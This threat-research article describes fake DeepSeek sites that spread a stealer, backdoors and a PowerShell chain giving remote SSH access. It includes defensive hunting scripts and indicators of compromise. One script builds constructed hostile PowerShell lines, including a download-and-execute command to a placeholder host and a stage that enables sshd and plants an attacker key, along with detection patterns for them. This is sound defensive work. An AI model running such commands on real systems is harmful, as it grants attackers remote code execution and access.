
@ Cybersecurity & cyberwarfare
2025-03-06 10:00:04
Trojans disguised as AI: Cybercriminals exploit DeepSeek’s popularity
Introduction
Among the most significant events in the AI world in early 2025 was the release of DeepSeek-R1, a powerful reasoning large language model (LLM) with open weights. It is available both for local use and as a free online service. Since DeepSeek was the first to give a wide audience free access to a reasoning LLM, it quickly gained popularity, mirroring the success of ChatGPT. Naturally, this surge in interest also attracted cybercriminals.
While analyzing our internal threat intelligence data, we discovered several groups of websites mimicking the official DeepSeek chatbot site and distributing malicious code disguised as a client for the popular service.
Screenshot of the official DeepSeek website (February 2025)
Scheme 1: Python stealer and non-existent DeepSeek client
The first group of websites was hosted on domains whose names included DeepSeek model versions (V3 and R1):
r1-deepseek[.]net;
v3-deepseek[.]com.
As shown in the screenshot, the fake website offers no way to start a chat; the only action available is downloading an application. The real DeepSeek, however, has no official Windows client, so the download itself is the giveaway.
Screenshot of the fake website
Clicking the “Get DeepSeek App” button downloads a small archive, deep-seek-installation.zip. The archive contains a Windows shortcut, DeepSeek Installation.lnk, which holds a URL.
At the time of publishing this research, the attackers had modified the fake page hosted on the v3-deepseek[.]com domain: it now prompts users to download a client for the Grok model developed by xAI. We are observing similar activity on the v3-grok[.]com domain as well. The purported client is an archive named grok-ai-installation.zip that contains the same shortcut.
Executing the .lnk file runs a script fetched from the URL inside the shortcut. This script downloads and unpacks an archive named f.zip.
Contents of the unpacked archive
Next, the script runs the 1.bat file from the unpacked archive.
Contents of the BAT file
The downloaded archive also contains the files svchost.exe and python.py. The first is a legitimate python.exe renamed to mimic a Windows system process, so that a user inspecting running applications in Task Manager sees nothing out of the ordinary.
It is used to launch python.py, which contains the malicious payload (we have also seen this file named code.py). This is a stealer written in Python that we had not previously seen in attacks. If it executes successfully, the attackers obtain a wealth of data from the victim’s computer: cookies and session tokens from various browsers, login credentials for email, gaming and other accounts, files with certain extensions, cryptocurrency wallet data, and more.
After collecting the data, the script packs it into an archive and sends it to the operators either through a Telegram bot or by uploading it to the Gofile file-sharing service. Thus, an attempt to use the chatbot can cost the victim their social media accounts, personal data and even cryptocurrency. If corporate credentials are stored on the compromised device, the victim’s entire organization is also at risk, with far more severe consequences.
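The renamed interpreter is the detail a defender can hunt for. The script below is an added example, not part of the original research or Kaspersky’s tooling: it runs a few masquerading checks over constructed process-creation events that use the field names of Sysmon Event ID 1. The paths, the user name and the parent processes are assumptions made for illustration.

```python
"""Hunt for an interpreter renamed to svchost.exe in process-creation telemetry.

Added example, not Kaspersky's code. The events are constructed and use the
field names of Sysmon Event ID 1 (Image, OriginalFileName, CommandLine,
ParentImage); paths, user names and parents are made up for illustration.
"""
import ntpath

# Where the genuine svchost.exe lives. Sysmon records the full path in Image.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Script hosts that are commonly renamed to blend in.
INTERPRETERS = {"python.exe", "pythonw.exe", "powershell.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}


def check_event(ev):
    """Return the reasons this process-creation event looks like masquerading."""
    image = ev.get("Image", "")
    name = ntpath.basename(image).lower()
    folder = ntpath.dirname(image).lower()
    orig = ev.get("OriginalFileName", "").lower()
    args = [t.strip('"') for t in ev.get("CommandLine", "").lower().split()]
    reasons = []
    if name == "svchost.exe" and folder not in SYSTEM_DIRS:
        reasons.append(f"svchost.exe launched from {folder}")
    # OriginalFileName is read from the PE version resource, which renaming the
    # file on disk does not change. Attackers can strip or forge it, so treat a
    # mismatch as supporting evidence, not proof.
    if orig and orig != name:
        reasons.append(f"OriginalFileName {orig} differs from image name {name}")
    if orig in INTERPRETERS and name not in INTERPRETERS:
        reasons.append(f"script interpreter {orig} renamed to {name}")
    # A .py argument is independent of how the binary describes itself.
    if name == "svchost.exe" and any(a.endswith(".py") for a in args[1:]):
        reasons.append("svchost.exe handed a .py script")
    return reasons


def hunt(events):
    """Return [(Image, reasons)] for every event that triggered at least one check."""
    return [(ev.get("Image", ""), r) for ev in events if (r := check_event(ev))]


# Constructed telemetry: a genuine service host, a renamed python.exe as in the
# campaign, the same binary with its version resource stripped, and a normal
# python.exe running a build script.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\f\svchost.exe",
     "OriginalFileName": "python.exe",
     "CommandLine": "svchost.exe python.py",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\f\svchost.exe",
     "OriginalFileName": "",
     "CommandLine": r'"C:\Users\victim\AppData\Local\Temp\f\svchost.exe" "code.py"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\Python312\python.exe", "OriginalFileName": "python.exe",
     "CommandLine": "python.exe build.py",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for image, reasons in hunt(SAMPLE_EVENTS):
        print(image)
        for reason in reasons:
            print("   -", reason)
```

OriginalFileName comes from the PE version resource, which a rename on disk does not touch, so the renamed python.exe still reports python.exe; the third sample shows that the location and .py-argument checks still fire when the attacker strips that resource.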
Scheme 2: Malicious script and a million views
In another case, fake DeepSeek websites were found on the following domains:
deepseek-pc-ai[.]com
deepseek-ai-soft[.]com
We first saw the former domain in early February, when it hosted only the default Apache web server page. Later it began serving a page closely resembling the DeepSeek website. Notably, the fake site uses geofencing: requests from certain IP addresses, such as Russian ones, receive a placeholder page filled with generic SEO text about DeepSeek (we believe this text may have been LLM-generated):
If the IP address and other request parameters meet the attackers’ criteria, the server returns a page resembling DeepSeek. Users are offered a choice between downloading a client and starting the chatbot, but either action downloads a malicious installer built with Inno Setup. Kaspersky products detect it as Trojan-Downloader.Win32.TookPS.*.
When executed, the installer contacts malicious URLs to receive a command that it then runs through cmd. The most common command launches powershell.exe with a Base64-encoded script as an argument. That script fetches an encoded URL to download a further PowerShell script, which enables the built-in SSH service (Windows’ OpenSSH server) and modifies its configuration to accept the attacker’s keys, giving them remote access to the victim’s computer.
Part of the malicious PowerShell script
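To see what such a command actually does, an analyst first has to decode it. The following is an added example, not code from the original article: it pulls the Base64 argument out of a PowerShell command line, decodes it as UTF-16LE, and matches the result against a small indicator table. The command lines, the two script stages, the example.invalid URL and the SSH key are constructed placeholders that mirror the behaviour described above, not the real scripts.

```python
"""Decode and triage encoded PowerShell command lines.

Added example, not Kaspersky's code. powershell.exe accepts a Base64 string
after -EncodedCommand (abbreviations such as -enc or -e also work); the bytes
decode as UTF-16LE, not UTF-8, which is the usual stumbling block. The command
lines and the two script stages below are constructed to mirror the behaviour
the article describes (download a second stage that turns on the built-in
OpenSSH server and plants an attacker key); the URL and the key are placeholders.
"""
import base64
import re

# -e, -ec, -en, -enc, -encodedcommand ... followed by a Base64 blob.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc[a-z]*)\s+([A-Za-z0-9+/=]{8,})")

# What to look for in a decoded script. Keys double as finding labels.
INDICATORS = {
    "downloads further code": re.compile(
        r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"),
    "executes downloaded text": re.compile(r"(?i)Invoke-Expression|\biex\b"),
    "enables built-in OpenSSH server": re.compile(
        r"(?i)OpenSSH\.Server|(Set|Start)-Service\s+(-Name\s+)?sshd\b"),
    "writes SSH authorized keys": re.compile(
        r"(?i)administrators_authorized_keys|authorized_keys"),
    "embeds a public key": re.compile(r"ssh-(rsa|ed25519|ecdsa[\w-]*)\s+AAAA"),
}


def encode_command(script):
    """Produce what an attacker passes to -EncodedCommand (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script from a command line, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(script):
    """Return the indicator labels that match a decoded script, in table order."""
    return [label for label, rx in INDICATORS.items() if rx.search(script)]


def scan_command_lines(lines):
    """Decode every encoded PowerShell invocation and report (index, script, findings)."""
    report = []
    for i, line in enumerate(lines):
        script = decode_encoded_command(line)
        if script is not None:
            report.append((i, script, triage(script)))
    return report


# Constructed stages: stage 1 is what the installer passes to powershell.exe,
# stage 2 is what that downloader fetches. example.invalid is a reserved name
# and the key is a placeholder, not a real public key.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.ps1')"
STAGE2 = (
    "Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0\n"
    "Set-Service -Name sshd -StartupType Automatic\n"
    "Start-Service sshd\n"
    "Add-Content -Path \"$env:ProgramData\\ssh\\administrators_authorized_keys\" "
    "-Value 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYNOTREAL attacker@example.invalid'\n"
)

# Constructed command lines: one benign scheduled script, one hidden encoded launch.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "cmd.exe /c powershell.exe -nop -w hidden -enc " + encode_command(STAGE1),
]

if __name__ == "__main__":
    for idx, script, findings in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(f"line {idx}: {findings}\n  {script}")
    print("stage 2:", triage(STAGE2))
```

The indicator table is deliberately narrow; in a real hunt the decoded text should also be fed to a generic PowerShell deobfuscator, since a second Base64 or compression layer inside the script is common.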
This case is notable because we managed to identify the primary vector for spreading the malicious links – posts on the social network X (formerly Twitter):
This post, directing users to deepseek-pc-ai[.]com, was made from an account belonging to an Australian company. It gained 1.2 million views and over a hundred reposts, most of which were probably made by bots: note the similar usernames and identifiers in their bios.
Some users did point out in the comments that the link was malicious.
Links to deepseek-ai-soft[.]com were also distributed through X posts, but by the time of our investigation those posts survived only in Google’s cache:
Scheme 3: Backdoors and attacks on Chinese users
We also encountered sites that directly distributed malicious executable files. One such file was associated with the following domains:
app.delpaseek[.]com;
app.deapseek[.]com;
dpsk.dghjwd[.]cn.
These attacks target more technically advanced users: the downloaded payload mimics Ollama, a framework for running LLMs such as DeepSeek on local hardware, which lowers suspicion among potential victims. Kaspersky solutions detect this payload as Backdoor.Win32.Xkcp.a.
The victim only needs to launch the “DeepSeek client” to trigger the malware, which establishes a KCP tunnel (KCP is a reliable transport protocol usually carried over UDP) with predefined parameters.
Additionally, we observed attacks in which the victim’s device downloaded the deep_windows_Setup.zip archive, containing a malicious executable, from the following domains:
deep-seek[.]bar;
deep-seek[.]rest.
The malware in the archive is detected by Kaspersky solutions as Trojan.Win32.Agent.xbwfho. It is an installer created with Inno Setup that relies on DLL sideloading to load a malicious library. The DLL in turn extracts a payload hidden with steganography, a modified Farfli backdoor, loads it into memory and injects it into a process.
Judging by the language of the bait pages, both of these campaigns target Chinese-speaking users.
Conclusion
The nature of the fake websites described in this article suggests these campaigns are widespread and not aimed at specific users.
Cybercriminals use various schemes to lure victims to malicious resources. Typically, links to such sites are spread through messengers and social networks, as in the X post above. Attackers may also rely on typosquatting or buy ad traffic to malicious sites through the numerous affiliate programs.
We strongly advise users to check the addresses of the websites they visit carefully, especially when links come from unverified sources, and all the more so for highly popular services. In this case, it bears repeating that DeepSeek has no native Windows client. This is not the first time cybercriminals have exploited the popularity of chatbots to distribute malware: they have previously targeted regular users with Trojans disguised as ChatGPT clients and developers with malicious packages on PyPI. Simple digital hygiene, combined with a modern security solution, significantly reduces the risk of infection and personal data loss.
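Checking addresses by eye scales poorly, which is why brand monitoring automates it. The script below is an added example rather than part of the original article: it runs two look-alike checks over the domains from this article’s indicators plus a few constructed names, flagging labels that contain the brand and labels within a small edit distance of it. The allowlist, the distance threshold and the benign .example names are assumptions.

```python
"""Flag look-alike domains for a brand label.

Added example, not Kaspersky's code. Two signals are combined: the brand
token appearing inside a label (deepseek-pc-ai) and a small optimal string
alignment distance, a Damerau-Levenshtein variant, between a label and the
brand (deapseek, delpaseek). The input mixes the domains listed in this
article's indicators with constructed benign names (.example is reserved).
"""

BRAND = "deepseek"
LEGIT = {"deepseek.com"}  # the genuine domain and its subdomains are allowlisted


def osa_distance(a, b):
    """Edits needed to turn a into b: insert, delete, substitute, swap adjacent."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # delete
                          d[i][j - 1] + 1,          # insert
                          d[i - 1][j - 1] + cost)   # substitute
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transpose
    return d[len(a)][len(b)]


def normalize(label):
    """Lower-case and drop hyphens so deep-seek and r1-deepseek compare as deepseek."""
    return label.lower().replace("-", "")


def classify_domain(domain, brand=BRAND, max_distance=2, legit=LEGIT):
    """Return (verdict, offending label, distance) or None for an unremarkable name.

    The last label is treated as the suffix; a real deployment should use the
    Public Suffix List so that co.uk and similar suffixes are handled correctly.
    """
    host = domain.replace("[.]", ".").lower().strip(".")
    if host in legit or any(host.endswith("." + g) for g in legit):
        return None
    candidates = []
    for label in host.split(".")[:-1]:
        norm = normalize(label)
        if norm == brand:
            candidates.append(("brand-as-label", label, 0))
        elif brand in norm:
            candidates.append(("brand-in-label", label, 0))
        else:
            dist = osa_distance(norm, brand)
            if dist <= max_distance:
                candidates.append(("lookalike", label, dist))
    return min(candidates, key=lambda c: c[2]) if candidates else None


def scan_domains(domains):
    """Map each input domain to its verdict."""
    return {d: classify_domain(d) for d in domains}


# Article indicators (defanged as published) plus constructed benign names.
SAMPLE_DOMAINS = [
    "r1-deepseek[.]net", "v3-deepseek[.]com", "deepseek-pc-ai[.]com",
    "deepseek-ai-soft[.]com", "app.delpaseek[.]com", "app.deapseek[.]com",
    "dpsk.dghjwd[.]cn", "deep-seek[.]bar", "deep-seek[.]rest",
    "chat.deepseek.com", "example.com", "deepsea.example",
]

if __name__ == "__main__":
    for dom, verdict in scan_domains(SAMPLE_DOMAINS).items():
        print(f"{dom:28} {verdict}")
```

The exact-match indicators are still needed: dpsk.dghjwd[.]cn is not a look-alike at all, and the constructed deepsea.example shows that a threshold of 2 also catches unrelated short names, so the output is a review queue, not a block list.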
Indicators of compromise
MD5
4ef18b2748a8f499ed99e986b4087518
155bdb53d0bf520e3ae9b47f35212f16
6d097e9ef389bbe62365a3ce3cbaf62d
3e5c2097ffb0cb3a6901e731cdf7223b
e1ea1b600f218c265d09e7240b7ea819
7cb0ca44516968735e40f4fac8c615ce
7088986a8d8fa3ed3d3ddb1f5759ec5d
Malicious domains
r1-deepseek[.]net
v3-deepseek[.]com
deepseek-pc-ai[.]com
deepseek-ai-soft[.]com
app.delpaseek[.]com
app.deapseek[.]com
dpsk.dghjwd[.]cn
deep-seek[.]bar
deep-seek[.]rest
v3-grok[.]com
securelist.com/backdoors-and-s…